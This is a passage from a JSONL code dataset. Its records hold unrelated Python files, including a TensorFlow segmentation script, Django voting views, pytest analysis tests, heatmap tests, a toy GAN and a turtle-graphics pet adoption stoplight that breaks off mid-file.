scipy.misc.toimage(img)\n street_im.paste(mask, box=None, mask=mask)\n\n return scipy.misc.fromimage(street_im)\n\n# get session and tensors loaded\nsess = tf.Session()\nsaver = tf.train.import_meta_graph('model/bartlebooth-fcn.meta')\nsaver.restore(sess, tf.train.latest_checkpoint('./model'))\nprint('model restored')\n\nimage_pl = tf.get_default_graph().get_tensor_by_name(\"image_input:0\")\nlogits = tf.get_default_graph().get_tensor_by_name(\"logits:0\")\nkeep_prob = tf.get_default_graph().get_tensor_by_name(\"keep_prob:0\")\nimage_shape = (160, 576)\n\n# this is single image pipeline\n\nif RUN_VIDEO:\n output = 'windy_road_output.mp4'\n clip = VideoFileClip(\"windy_road.mp4\").subclip(5,7)\n clip = clip.fl_image(pipeline)\n\n # write to file\n clip.write_videofile(output)\nelse:\n pred_img = \"test.png\"\n img = scipy.misc.imresize(scipy.misc.imread(pred_img), image_shape)\n scipy.misc.imsave('prediction.png', pipeline(img))\n","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"299085568","text":"from django.shortcuts import render\nfrom django.http.request import HttpRequest\nfrom django.http.response import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_POST\n\nfrom ClubVote.service import user_option_service, error_service, question_service, user_service\n\n# Create your views here.\n\n\ndef index(request):\n\n print(request.META)\n\n COMPUTERNAME = request.META.get('COMPUTERNAME', '未知主机名')\n REMOTE_ADDR = user_service.get_user_addr(request)\n\n if not REMOTE_ADDR:\n REMOTE_ADDR = '0.0.0.0'\n if not COMPUTERNAME:\n COMPUTERNAME = '未知主机名'\n\n vote = question_service.get_vote(1, REMOTE_ADDR, COMPUTERNAME)\n return render(request, 'ClubVote/index.html', vote)\n\n@require_POST\n@csrf_exempt\ndef user_choose(request):\n \"\"\"\n 用户选择的接口\n :param request:\n :return:\n \"\"\"\n user_id = request.POST['user_id']\n user_key = request.POST['user_key']\n\n if user_service.check_user_valid(user_id, user_key):\n user_option_service.user_choose(\n request.POST['question_id']\n ,request.POST['option_id']\n ,request.POST['option_index']\n ,request.POST['user_id']\n )\n print('ok at choose')\n return HttpResponse('ok')\n else:\n print('error at choose')\n return HttpResponse('error')\n\ndef response_error(request):\n \"\"\"\n 报告错误信息\n :param request:\n :return:\n \"\"\"\n error_service.error(request.POST['question_id'], request.POST['user_id'])","sub_path":"Vote/ClubVote/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"312363469","text":"import os\nimport glob\nimport pytest\nimport shutil\nimport pele_platform.constants.constants as cs\nimport pele_platform.main as main\nfrom pele_platform.analysis import Analysis, DataHandler, Plotter\n\ntest_path = os.path.join(cs.DIR, \"Examples\")\nsimulation_path = \"../pele_platform/Examples/analysis/data/output\"\ndata = \"data\"\nREPORT_NAME = \"report\"\nTRAJ_NAME = \"trajectory.pdb\"\nANALYSIS_ARGS = os.path.join(test_path, \"analysis/input.yaml\")\nANALYSIS_FLAGS0 = os.path.join(test_path, \"analysis/input_flags0.yaml\")\nANALYSIS_FLAGS = os.path.join(test_path, \"analysis/input_flags.yaml\")\nANALYSIS_XTC_ARGS = os.path.join(test_path, \"analysis/input_xtc.yaml\")\n\n\n@pytest.mark.parametrize((\"x\", \"y\", 
\"z\"), [(4, 5, 6), (5, 6, None)])\ndef test_plotter(x, y, z):\n \"\"\"\n Checks if the scatter and KDE plots are created correctly.\n Parameters\n ----------\n x : int\n Metric to x\n y :\n Metric to y\n z :\n Metric to z\n Returns\n -------\n Folder with plots.\n \"\"\"\n output_folder = \"tmp/plots\"\n if os.path.exists(output_folder):\n shutil.rmtree(output_folder)\n\n data_handler = DataHandler(\n sim_path=simulation_path,\n report_name=REPORT_NAME,\n trajectory_name=TRAJ_NAME,\n be_column=5,\n )\n dataframe = data_handler.get_reports_dataframe()\n plotter = Plotter(dataframe)\n output_scatter = plotter.plot_two_metrics(x, y, z, output_folder=output_folder)\n output_kde = plotter.plot_kde(x, y, output_folder=output_folder, kde_structs=10)\n\n assert os.path.exists(output_scatter)\n assert os.path.exists(output_kde)\n\n\n@pytest.mark.parametrize(\n (\"n_poses\", \"expected_energies\"),\n [\n (0, []),\n (1, [0.879]),\n (4, [0.879, 2.203, 3.563, 6.624]),\n ],\n)\ndef test_top_poses(n_poses, expected_energies):\n \"\"\"\n Checks if data_handler extracts the correct number of top poses and associated metrics.\n Returns\n -------\n Folder with top poses.\n \"\"\"\n output_folder = \"tmp/top_poses\"\n if os.path.exists(output_folder):\n shutil.rmtree(output_folder)\n\n analysis = Analysis(\n resname=\"LIG\",\n chain=\"Z\",\n simulation_output=\"../pele_platform/Examples/clustering\",\n skip_initial_structures=False,\n )\n top_poses = analysis.generate_top_poses(output_folder, n_poses)\n top_poses_rounded = [round(pose, 3) for pose in top_poses]\n\n # Check if correct energy values were extracted\n assert len(top_poses) == n_poses\n for energy in expected_energies:\n assert energy in top_poses_rounded\n\n # Check if correct number of files was saved\n results = [\n os.path.basename(file)\n for file in glob.glob(os.path.join(output_folder, \"*pdb\"))\n ]\n assert len(results) == n_poses\n\n\n@pytest.mark.parametrize(\n (\"yaml_file\", \"n_expected_outputs\", \"expected_files\"),\n [\n (\n ANALYSIS_FLAGS0,\n 4,\n [\n \"distance0_Binding_Energy_plot.png\",\n \"currentEnergy_Binding_Energy_distance0_plot.png\",\n \"sasaLig_Binding_Energy_plot.png\",\n \"currentEnergy_Binding_Energy_sasaLig_plot.png\",\n ],\n ),\n (\n ANALYSIS_FLAGS,\n 2,\n [\n \"currentEnergy_Binding_Energy_distance0_plot.png\",\n \"distance0_Binding_Energy_plot.png\",\n ],\n ),\n ],\n)\ndef test_analysis_flags(yaml_file, n_expected_outputs, expected_files):\n \"\"\"\n Runs full simulation with input.yaml with some unusual flags, check the number of created plots and their names to\n ensure correct metrics were take into account.\n Parameters\n ----------\n yaml_file : str\n Path to input.yaml\n n_expected_outputs : int\n Number of expected plots.\n expected_files : List[str]\n List of expected plot names.\n Returns\n -------\n Folder with plots\n \"\"\"\n output_folder = \"../pele_platform/Examples/analysis/data/results/plots/\"\n if os.path.exists(output_folder):\n shutil.rmtree(output_folder)\n\n main.run_platform(yaml_file)\n\n for file in expected_files:\n file_path = os.path.join(output_folder, file)\n assert os.path.exists(file_path)\n\n all_files = glob.glob(os.path.join(output_folder, \"*png\"))\n assert len(all_files) == n_expected_outputs\n\n\n@pytest.mark.parametrize((\"yaml_file\", \"expected_poses\", \"expected_clusters\"),\n [(ANALYSIS_ARGS, 1, 0), (ANALYSIS_XTC_ARGS, 3, 2)])\ndef test_analysis_production(yaml_file, expected_poses, expected_clusters):\n \"\"\"\n Runs production analysis from input.yaml, both for 
PDB and XTC trajectories.\n Parameters\n ----------\n yaml_file : str\n Path to input.yaml\n Returns\n -------\n Parameters object with simulation parameters.\n \"\"\"\n job_params = main.run_platform(yaml_file)\n\n results_folder = os.path.join(job_params.pele_dir, \"results\")\n top_poses = glob.glob(os.path.join(results_folder, \"top_poses/*pdb\"))\n clusters = glob.glob(os.path.join(results_folder, \"clusters/*pdb\"))\n\n assert len(top_poses) == expected_poses\n assert len(clusters) == expected_clusters\n\n # Clean up\n shutil.rmtree(results_folder)\n\n\n@pytest.mark.parametrize(\n (\"method\", \"bandwidth\", \"n_clusters\"),\n [\n (\"hdbscan\", 5, 0), # only gets orphan clusters [-1]\n (\"meanshift\", 100, 1),\n (\"meanshift\", 30, 3),\n (\"gaussianmixture\", 1, 2),\n ],\n)\ndef test_clustering_methods(method, bandwidth, n_clusters):\n \"\"\"\n Checks if built-in clustering methods are producing expected number of clusters.\n\n Parameters\n ----------\n method : str\n Built-in clustering method, e.g. \"dbscan\".\n bandwidth : float\n Bandwidth for meanshift (or epsilon for DBSCAN).\n n_clusters : int\n Number of clusters for the Gaussian mixture model.\n\n Returns\n -------\n Folder with clusters, plots and report.\n \"\"\"\n working_folder = \"clustering_method\"\n results = os.path.join(working_folder, \"*pdb\")\n\n if os.path.exists(working_folder):\n shutil.rmtree(working_folder)\n\n analysis = Analysis(\n resname=\"LIG\", chain=\"Z\",\n simulation_output=\"../pele_platform/Examples/clustering\",\n skip_initial_structures=False)\n analysis.generate_clusters(working_folder, method,\n bandwidth=bandwidth,\n analysis_nclust=n_clusters)\n assert len(glob.glob(results)) == n_clusters\n\n\ndef test_analysis_api():\n \"\"\"\n Runs full analysis workflow (with GMM clustering).\n Returns\n -------\n Returns a directory with top_poses, clusters and plots.\n \"\"\"\n working_folder = \"full_analysis\"\n output = \"../pele_platform/Examples/clustering\"\n n_clusts = 3\n\n analysis = Analysis(resname=\"LIG\", chain=\"Z\",\n simulation_output=output,\n skip_initial_structures=False)\n analysis.generate(working_folder, \"gaussianmixture\",\n analysis_nclust=n_clusts)\n\n # Check if reports exist\n assert os.path.exists(os.path.join(working_folder, \"data.csv\"))\n assert os.path.exists(os.path.join(working_folder, \"summary.pdf\"))\n\n # Check plots\n plots = glob.glob(os.path.join(working_folder, \"plots\", \"*png\"))\n assert len(plots) == 2\n\n # Check top poses\n top_poses = glob.glob(os.path.join(working_folder, \"top_poses\", \"*pdb\"))\n assert len(top_poses) == 7\n\n # Check clusters\n clusters = glob.glob(os.path.join(working_folder, \"clusters\", \"*pdb\"))\n assert len(clusters) == n_clusts\n\n # Check if data.csv exists and is not empty\n data_csv = os.path.join(working_folder, \"data.csv\")\n assert os.path.exists(data_csv)\n\n with open(data_csv, \"r\") as file:\n lines = file.readlines()\n assert len(lines) == 8\n assert lines[0] == \"Step,numberOfAcceptedPeleSteps,currentEnergy,Binding Energy,sasaLig,epoch,trajectory,Cluster\\n\"\n","sub_path":"tests/test_analysis.py","file_name":"test_analysis.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"287197171","text":"class NumberUtil(object):\n @staticmethod\n def truncate_digits(in_number: float, max_digits: int) -> float:\n \"\"\"Restrict maximum decimal digits by removing them\"\"\"\n working_num = int(in_number * (10 ** 
max_digits))\n return working_num / (10 ** max_digits)\n\n @staticmethod\n def format_float(in_number: float) -> str:\n \"\"\"Format a float with un-necessary chars removed. E.g: 1.0000 == 1\"\"\"\n as_str = f\"{in_number:.6f}\".rstrip('0')\n if as_str[len(as_str) - 1] == '.':\n as_str = as_str.replace('.', '')\n return as_str\n","sub_path":"util/number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"456792832","text":"# -*- coding: utf-8 -*-\n\nimport random\n\nfrom PIL import Image\n\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nimport heatmap\nfrom heatmap import colorschemes\n\n\nclass TestHeatmap(unittest.TestCase):\n \"\"\"unittests for TestHeatmap\"\"\"\n\n def setUp(self):\n self.heatmap = heatmap.Heatmap()\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_random_defaults(self):\n pts = [(random.random(), random.random()) for x in range(400)]\n img = self.heatmap.heatmap(pts)\n img.save(\"01-400-random.png\")\n\n self.assertIsInstance(img, Image.Image)\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_vert_line(self):\n pts = [(50, x) for x in range(100)]\n img = self.heatmap.heatmap(pts, area=((0, 0), (200, 200)))\n img.save(\"02-vert-line.png\")\n\n self.assertIsInstance(img, Image.Image)\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_horz_line(self):\n pts = [(x, 300) for x in range(600, 700)]\n img = self.heatmap.heatmap(\n pts, size=(800, 400), area=((0, 0), (800, 400)))\n img.save(\"03-horz-line.png\")\n\n self.assertIsInstance(img, Image.Image)\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_random(self):\n pts = [(random.random(), random.random()) for x in range(40000)]\n\n # This should also generate a warning on stderr of overly dense.\n img = self.heatmap.heatmap(pts, dotsize=25, opacity=128)\n img.save(\"04-40k-random.png\")\n\n self.assertIsInstance(img, Image.Image)\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_square(self):\n pts = [(x*100, 50) for x in range(2, 50)]\n pts.extend([(4850, x*100) for x in range(2, 50)])\n pts.extend([(x*100, 4850) for x in range(2, 50)])\n pts.extend([(50, x*100) for x in range(2, 50)])\n\n img = self.heatmap.heatmap(\n pts, dotsize=100, area=((0, 0), (5000, 5000)))\n img.save(\"05-square.png\")\n\n self.assertIsInstance(img, Image.Image)\n\n # TODO: Make test case remove created image on success, maybe?\n def test_heatmap_single_point(self):\n pts = [(random.uniform(-77.012, -77.050),\n random.uniform(38.888, 38.910)) for x in range(100)]\n img = self.heatmap.heatmap(pts)\n self.heatmap.save_kml(\"06-wash-dc.kml\")\n\n self.assertIsInstance(img, Image.Image)\n\n def test_invalid_heatmap(self):\n self.assertRaises(Exception, self.heatmap.heatmap, ([],))\n\n\nclass TestColorScheme(unittest.TestCase):\n\n def test_schemes(self):\n self.assertSetEqual(set(colorschemes.valid_schemes()),\n {'fire', 'pgaitch', 'pbj', 'omg', 'classic'})\n\n def test_values(self):\n rgb_colors = range(256)\n\n for scheme, colors in colorschemes.SCHEMES.iteritems():\n self.assertIsInstance(colors, list)\n self.assertEqual(len(colors), 256)\n\n for color in colors:\n self.assertIsInstance(color, tuple)\n self.assertEqual(len(color), 3)\n\n red, green, blue = color\n\n self.assertIsInstance(red, int)\n self.assertIn(red, 
rgb_colors)\n\n self.assertIsInstance(green, int)\n self.assertIn(green, rgb_colors)\n\n self.assertIsInstance(blue, int)\n self.assertIn(blue, rgb_colors)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"387810165","text":"# October 2013, Glenn F. Matthews\n# Copyright (c) 2013-2017 the COT project developers.\n# See the COPYRIGHT.txt file at the top-level directory of this distribution\n# and at https://github.com/glennmatthews/cot/blob/master/COPYRIGHT.txt.\n#\n# This file is part of the Common OVF Tool (COT) project.\n# It is subject to the license terms in the LICENSE.txt file found in the\n# top-level directory of this distribution and at\n# https://github.com/glennmatthews/cot/blob/master/LICENSE.txt. No part\n# of COT, including this file, may be copied, modified, propagated, or\n# distributed except according to the terms contained in the LICENSE.txt file.\n\n\"\"\"Package for identifying guest platforms and handling platform differences.\n\nThe :class:`~COT.platforms.generic.GenericPlatform` class describes the API\nand provides a generic implementation that can be overridden by subclasses\nto provide platform-specific logic.\n\nIn general, other modules should not instantiate subclasses directly but should\ninstead use the :func:`~COT.platforms.platform_from_product_class` API to\nderive the appropriate subclass instance.\n\nAPI\n---\n\n.. autosummary::\n :nosignatures:\n\n is_known_product_class\n platform_from_product_class\n\nPlatform modules\n----------------\n\n.. autosummary::\n :toctree:\n\n COT.platforms.generic\n COT.platforms.cisco_csr1000v\n COT.platforms.cisco_iosv\n COT.platforms.cisco_iosxrv\n COT.platforms.cisco_iosxrv_9000\n COT.platforms.cisco_nexus_9000v\n COT.platforms.cisco_nxosv\n\"\"\"\n\nimport logging\n\nfrom .generic import GenericPlatform\nfrom .cisco_csr1000v import CSR1000V\nfrom .cisco_iosv import IOSv\nfrom .cisco_iosxrv import IOSXRv, IOSXRvRP, IOSXRvLC\nfrom .cisco_iosxrv_9000 import IOSXRv9000\nfrom .cisco_nexus_9000v import Nexus9000v\nfrom .cisco_nxosv import NXOSv\n\nlogger = logging.getLogger(__name__)\n\n\nPRODUCT_PLATFORM_MAP = {\n 'com.cisco.csr1000v': CSR1000V,\n 'com.cisco.iosv': IOSv,\n 'com.cisco.n9k': Nexus9000v,\n 'com.cisco.nx-osv': NXOSv,\n 'com.cisco.ios-xrv': IOSXRv,\n 'com.cisco.ios-xrv.rp': IOSXRvRP,\n 'com.cisco.ios-xrv.lc': IOSXRvLC,\n 'com.cisco.ios-xrv9000': IOSXRv9000,\n # Some early releases of IOS XRv 9000 used the\n # incorrect string 'com.cisco.ios-xrv64'.\n 'com.cisco.ios-xrv64': IOSXRv9000,\n}\n\"\"\"Mapping of known product class strings to Platform classes.\"\"\"\n\n\ndef is_known_product_class(product_class):\n \"\"\"Determine if the given product class string is a known one.\n\n Args:\n product_class (str): String such as 'com.cisco.iosv'\n\n Returns:\n bool: Whether product_class is known.\n\n Examples:\n ::\n\n >>> is_known_product_class(\"com.cisco.n9k\")\n True\n >>> is_known_product_class(\"foobar\")\n False\n \"\"\"\n return product_class in PRODUCT_PLATFORM_MAP\n\n\ndef platform_from_product_class(product_class):\n \"\"\"Get the class of Platform corresponding to a product class string.\n\n Args:\n product_class (str): String such as 'com.cisco.iosv'\n\n Returns:\n class: GenericPlatform or a subclass of it\n\n Examples:\n ::\n\n >>> platform_from_product_class(\"com.cisco.n9k\")\n \n >>> 
platform_from_product_class(None)\n \n >>> platform_from_product_class(\"frobozz\")\n \n \"\"\"\n if product_class is None:\n return GenericPlatform\n if is_known_product_class(product_class):\n return PRODUCT_PLATFORM_MAP[product_class]\n logger.warning(\"Unrecognized product class '%s' - known classes \"\n \"are %s. Treating as a generic platform\",\n product_class, PRODUCT_PLATFORM_MAP.keys())\n return GenericPlatform\n\n\n__all__ = (\n 'is_known_product_class',\n 'platform_from_product_class',\n)\n","sub_path":"COT/platforms/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"582851133","text":"#!/usr/bin/env python\n\nimport logging\n\nfrom xmlrpclib import ServerProxy\n\nfrom wrangler.config import config_base\n\nlog = logging.getLogger('wrangler.client')\n\nclass WranglerClient(object):\n def __init__(self, hostname=None, port=None):\n self.config = config_base()\n if not hostname:\n hostname = self.config.get('lasso', 'hostname')\n if not port:\n port = self.config.getint('lasso', 'port')\n log.debug('Starting client to %s:%d' % (hostname, port))\n self.client = ServerProxy('http://%s:%s' % (hostname, port), allow_none=True)\n \n\n def __getattr__(self, attr):\n func = getattr(self.client, attr)\n return func","sub_path":"src/wrangler/network/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"144401603","text":"############## CLASSES CODES #################\n\nclass Alarm:\n\n def __init__(self, state: bool) -> None:\n self.__state = state # private atribute\n\n def get_state(self) -> bool:\n return self.__state\n\n def set_state(self, value: bool) -> None:\n if isinstance(value, bool):\n self.__state = value\n else:\n print(\"Incorrect value! '{}' isn't boolean value.\" .format(value))\n\n\n################# TESTS ####################\n\nprint(\"\\n############## GETTER AND SETTERS TEST ################\\n\")\n\nal = Alarm(False)\n\nprint(al.get_state())\nal.set_state(True)\nprint(al.get_state())\nal.set_state(1)\nprint(al.get_state())","sub_path":"files/04_getters_setters_states.py","file_name":"04_getters_setters_states.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"138197208","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nimport tensorflow as tf\n\ndef import_csv():\n # import, set header names and change columns depending on content\n data = pd.read_csv('CD.txt',sep=',',names=['Date','Open','High','Low','Close','Volume'])\n\n # redefine data as being 0/1. 
1 when close > open and 0 in all other cases\n data_np = data.values\n new_array = []\n\n for i in range(0,len(data_np)):\n if data_np[i][4] > data_np[i][1]:\n new_array.append(1)\n else:\n new_array.append(-1)\n\n for i in range(1, len(new_array)):\n new_array[i] = new_array[i] + new_array[i - 1]\n\n scaler = MinMaxScaler(feature_range=(-1,1))\n\n array = scaler.fit_transform(np.reshape(np.array(new_array),newshape=(len(new_array),1)))\n\n return array, scaler\n\ndef sample_Z(m, n):\n return np.random.uniform(-1., 1., size=[m, n])\n\ndef generator(Z,hsize=[16, 16],reuse=False):\n with tf.variable_scope(\"GAN/Generator\",reuse=reuse):\n h1 = tf.layers.dense(Z,hsize[0],activation=tf.nn.leaky_relu)\n h2 = tf.layers.dense(h1,hsize[1],activation=tf.nn.leaky_relu)\n out = tf.layers.dense(h2,2)\n\n return out\n\ndef discriminator(X,hsize=[16, 16],reuse=False):\n with tf.variable_scope(\"GAN/Discriminator\",reuse=reuse):\n h1 = tf.layers.dense(X,hsize[0],activation=tf.nn.leaky_relu)\n h2 = tf.layers.dense(h1,hsize[1],activation=tf.nn.leaky_relu)\n h3 = tf.layers.dense(h2,2)\n out = tf.layers.dense(h3,1)\n\n return out, h3\n\ndef get_next(all_data,start_num,batch_size):\n return all_data[start_num:(start_num+batch_size)]\n\ndef main():\n data, scalar = import_csv()\n tf.reset_default_graph()\n data_x = np.arange(0,4000,1,dtype=float).reshape(4000,1)\n data_y = np.arange(0,-4000,-1,dtype=float).reshape(4000,1)\n # scalar = MinMaxScaler(feature_range=(-1,1))\n # data = scalar.fit_transform(data.reshape(-1,1))\n # data_y = scalar.fit_transform(data_y.reshape(-1,1))\n\n data = np.concatenate([data_x, data_y], axis=1)\n\n X = tf.placeholder(tf.float32, [None, 2])\n Z = tf.placeholder(tf.float32, [None, 2])\n\n G_sample = generator(Z)\n r_logits, r_rep = discriminator(X)\n f_logits, g_rep = discriminator(G_sample, reuse=True)\n\n disc_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=r_logits, labels=tf.ones_like(r_logits)) +\n tf.nn.sigmoid_cross_entropy_with_logits(logits=f_logits, labels=tf.zeros_like(f_logits)))\n gen_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=f_logits, labels=tf.ones_like(f_logits)))\n\n gen_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=\"GAN/Generator\")\n disc_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=\"GAN/Discriminator\")\n\n gen_step = tf.train.RMSPropOptimizer(learning_rate=0.001).minimize(gen_loss, var_list=gen_vars) # G Train step\n disc_step = tf.train.RMSPropOptimizer(learning_rate=0.001).minimize(disc_loss, var_list=disc_vars) # D Train step\n\n # sess = tf.Session(config=config)\n sess = tf.Session()\n tf.global_variables_initializer().run(session=sess)\n\n batch_size = 256\n nd_steps = 10\n ng_steps = 10\n\n gen_loss_arr = []\n disc_loss_arr = []\n\n for i in range(1000):\n start_num = int(np.random.uniform(0, 1) * len(data))\n if start_num > (len(data) - batch_size):\n start_num -= batch_size\n\n X_batch = get_next(data,start_num,batch_size)\n Z_batch = sample_Z(batch_size, 2)\n\n for _ in range(nd_steps):\n _, dloss = sess.run([disc_step, disc_loss], feed_dict={X: X_batch, Z: Z_batch})\n # rrep_dstep, grep_dstep = sess.run([r_rep, g_rep], feed_dict={X: X_batch, Z: Z_batch})\n\n for _ in range(ng_steps):\n _, gloss = sess.run([gen_step, gen_loss], feed_dict={Z: Z_batch})\n\n # rrep_gstep, grep_gstep = sess.run([r_rep, g_rep], feed_dict={X: X_batch, Z: Z_batch})\n\n # print(\"Iterations: %d\\t Discriminator loss: %.4f\\t Generator loss: %.4f\" % (i, dloss, gloss))\n 
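# A minimal NumPy sketch of the two losses alternated in this training
# loop: sigmoid cross-entropy with ones-labels on real logits plus
# zeros-labels on generated logits for the discriminator, and ones-labels
# on generated logits for the generator. The logit values below are
# illustrative only; this is not the record's TensorFlow graph.
import numpy as np

def sigmoid_xent(logits, labels):
    # Numerically stable form matching tf.nn.sigmoid_cross_entropy_with_logits:
    # max(x, 0) - x*z + log(1 + exp(-|x|))
    return np.maximum(logits, 0) - logits * labels + np.log1p(np.exp(-np.abs(logits)))

r_logits = np.array([2.0, 1.5])   # discriminator output on real samples
f_logits = np.array([-1.0, 0.5])  # discriminator output on generated samples
disc_loss = np.mean(sigmoid_xent(r_logits, 1.0) + sigmoid_xent(f_logits, 0.0))
gen_loss = np.mean(sigmoid_xent(f_logits, 1.0))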
gen_loss_arr.append(gloss)\n disc_loss_arr.append(dloss)\n if i % 100 == 0:\n print(\"Iterations: %d\\t Discriminator loss: %.4f\\t Generator loss: %.4f.\" % (i, dloss, gloss))\n answer = sess.run(G_sample, feed_dict={Z: Z_batch})\n ans_y = answer[:, 1]\n ans_x = answer[:, 0]\n # ans_y_re = scalar.inverse_transform(ans_y.reshape(-1, 1))\n # ans_x_re = scalar.inverse_transform(ans_x.reshape(-1, 1))\n plt.scatter(ans_x,ans_y)\n # plt.plot(np.reshape(answer,newshape=(batch_size,1)),color='r',label='Pred')\n # plt.plot(np.reshape(x_batch,newshape=(batch_size,1)),color='b',label='Actual')\n plt.title('Prediction Iter: {0}'.format(i))\n plt.savefig('./iteration_pred_{0}'.format(i))\n plt.close()\n\n plt.plot(disc_loss_arr, color='r', label='D')\n plt.plot(gen_loss_arr, color='b', label='G')\n plt.legend()\n plt.show()\n\n answer = []\n\n test_batch = sample_Z(batch_size, 2)\n # answer = sess.run(G_sample, feed_dict={Z: test_batch})\n # print(sess.run(f_logits,feed_dict={X: answer}))\n # print(sess.run(g_rep, feed_dict={Z: answer}))\n # plt.scatter(np.arange(0,len(answer),1),scalar.inverse_transform(answer).reshape(-1,1))\n answer = sess.run(G_sample, feed_dict={Z: Z_batch})\n ans_y = answer[:, 1]\n ans_x = answer[:, 0]\n # ans_y_re = scalar.inverse_transform(ans_y.reshape(-1, 1))\n # ans_x_re = scalar.inverse_transform(ans_x.reshape(-1, 1))\n plt.scatter(ans_x,ans_y)\n # plt.plot(scalar.inverse_transform(answer).reshape(-1,1))\n plt.show()\n\nif __name__ == '__main__':\n main()\n\n \"\"\"THEREFORE ADDING THE SECOND DIMENSION - X AXIS - LEADS TO A GOOD RESULT\"\"\"","sub_path":"Straight_Line_GAN.py","file_name":"Straight_Line_GAN.py","file_ext":"py","file_size_in_byte":5912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"579938044","text":"from django.urls import path\r\nfrom library_app import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('home/', views.home, name='home'),\r\n path('books/', views.BooksView.as_view(), name='books'),\r\n path('books//', views.BookDetail.as_view(), name='book-detail'),\r\n path('visitors/', views.VisitorsView.as_view(), name='visitors'),\r\n path('visitors//', views.VisitorDetail.as_view(), name='visitor-detail'),\r\n path('registrations/', views.RegistrationsView.as_view(), name='registrations'),\r\n path('registrations/add/', views.RegistrationCreate.as_view(), name='registration-add'),\r\n path('registrations/del//', views.RegistrationDelete.as_view(), name='registration-del'),\r\n path('registrations/upd//', views.RegistrationUpdate.as_view(), name='registration-upd'),\r\n path('registrations//', views.RegistrationDetail.as_view(), name='registration-detail'),\r\n]\r\n","sub_path":"Solutions/Task4/853502_Мария_Пугачёва/library_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"264648218","text":"import turtle\nwn = turtle.Screen()\nwn.title(\"Adoption Stoplight\")\nwn.bgcolor(\"black\")\n\n#Draw a box\npen = turtle.Turtle()\npen.color (\"yellow\")\npen.speed('fastest')\npen.width(3)\npen.hideturtle()\npen.penup()\npen.goto(-300,300)\npen.pendown()\npen.fd(240)\npen.rt(90)\npen.fd(560)\npen.rt(90)\npen.fd(240)\npen.rt(90)\npen.fd(560)\n\n\n#Red Light\n\nred_light= turtle.Turtle()\nred_light.shape(\"circle\")\nred_light.speed('fastest')\nred_light.shapesize(8,8,8)\nred_light.color(\"grey\")\nred_light.penup()\nred_light.goto(-180,200)\n\n#Yellow 
Light\nyellow_light= turtle.Turtle()\nyellow_light.shape(\"circle\")\nyellow_light.shapesize(8,8,8)\nyellow_light.speed('fastest')\nyellow_light.color(\"grey\")\nyellow_light.penup()\nyellow_light.goto(-180,20)\n\n#Green Light\ngreen_light= turtle.Turtle()\ngreen_light.shape(\"circle\")\ngreen_light.shapesize(8,8,8)\ngreen_light.speed('fastest')\ngreen_light.color(\"grey\")\ngreen_light.penup()\ngreen_light.goto(-180,-160)\n\n\n#About the animal\nscreen = turtle.Screen()\n\n\nanimal_name = screen.textinput(\"How Adoptable?\",\"What is the animal's name?\")\nanimal_type = screen.textinput(\"How Adoptable?\",\"Is the animal a cat or a dog?\")\nanimal_solid = screen.textinput(\"How Adoptable?\",\"Is this animal a solid color? (Yes or No)\")\nanimal_color = screen.textinput(\"How Adoptable?\",\"Does this animal have black on it? (Yes or No)\")\nanimal_age = int(screen.textinput(\"How Adoptable?\",\"What is the animal's age in months?\"))\n\npoints = 0\n\n#Cat\nif animal_type.lower() == \"cat\":\n#Special Breed\n cat_special = screen.textinput(\"How Adoptable?\",\"Is this a normal cat breed? (Yes or No)\")\n if cat_special.lower() == \"yes\":\n points = points + 1\n elif cat_special.lower() == \"no\":\n points = points - 2\n else:\n print(\"So sorry! I didn't get that\")\n#Cat colors\n if animal_solid.lower() == \"yes\":\n if animal_color.lower() == \"yes\":\n points = points + 3\n elif animal_color.lower() == \"no\":\n points = points - 1\n else:\n print(\"Sorry, something went wrong. Please try again.\")\n elif animal_solid.lower() == \"no\":\n if animal_color.lower() == \"yes\":\n points = points + 2\n elif animal_color.lower() == \"no\":\n points = points + 1\n else:\n print(\"Sorry, something went wrong. Try again.\")\n else: \n print(\"Sorry, I didn't get that\")\n#Cat Age\n if animal_age < 12:\n print(\"Green - this animal will have no problem getting adopted!\")\n elif animal_age >= 12 and animal_age < 36:\n points = points + 